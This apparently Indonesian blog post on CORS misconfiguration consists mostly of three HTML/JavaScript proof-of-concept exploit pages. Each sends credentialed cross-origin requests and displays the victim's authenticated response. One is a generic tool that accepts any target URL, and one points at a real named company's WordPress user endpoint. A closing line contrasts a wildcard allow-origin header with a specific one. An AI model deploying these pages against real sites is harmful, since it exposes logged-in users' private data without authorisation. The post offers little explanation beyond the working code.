CORS misconfiguration

pada tanggal

 

What is CORS (cross-origin resource sharing)? Tutorial & Examples | Web Security Academy


cross origin resource sharing

<!DOCTYPE html>
<html>
<head>
	<title>CORS Test Exploit</title>
</head>
<body>
<h3>CORS Test Exploit</h3>
<input type="text" name="target" placeholder="Target URL" autocomplete="off"> <button type="submit" onclick="submit()">Exploit Now!</button><br>
<pre id="result"></pre>
<script type="text/javascript">
	function submit() {
	  	var url 	= document.getElementsByName("target")[0].value;
		alert("Tested CORS : "+url);
		var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
              document.getElementById("result").innerHTML = '<pre>Respons (Status : <b>VULN</b> | status code : '+this.status+'):<br><br><textarea style="margin: 0px; width: 411px; height: 436px;"">'+this.responseText+'</textarea></pre>'
        }else{
            document.getElementById("result").innerHTML = "<pre>Respons (status : Not Vuln) : respons tidak ada , status code "+this.status+"</pre>";
        }
        };
      xhttp.open("GET", url, true);
      xhttp.withCredentials = true;
      xhttp.send();
	}
</script>
</body>
</html>
________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ 
<html>
     <body>
         <h2>CORS PoC</h2>
         <div id="demo">
             <button type="button" onclick="cors()">Exploit</button>
         </div>
         <script>
             function cors() {
             var xhr = new XMLHttpRequest();
             xhr.onreadystatechange = function() {
                 if (this.readyState == 4 && this.status == 200) {
                 document.getElementById("demo").innerHTML = alert(this.responseText);
                 }
             };
              xhr.open("GET",
                       "https://victim.example.com/endpoint", true);
             xhr.withCredentials = true;
             xhr.send();
             }
         </script>
     </body>
 </html>
 
________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________  
<html>

<script>

var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://nordvpn.com/wp-json/wp/v2/users/1',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };

</script>

</html>

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

 Acess-Control-Allow-Origin: *       vuln

Acess-Control-Allow-Origin:https://www.goodweb.com        not vuln

 

Komentar

Posting Komentar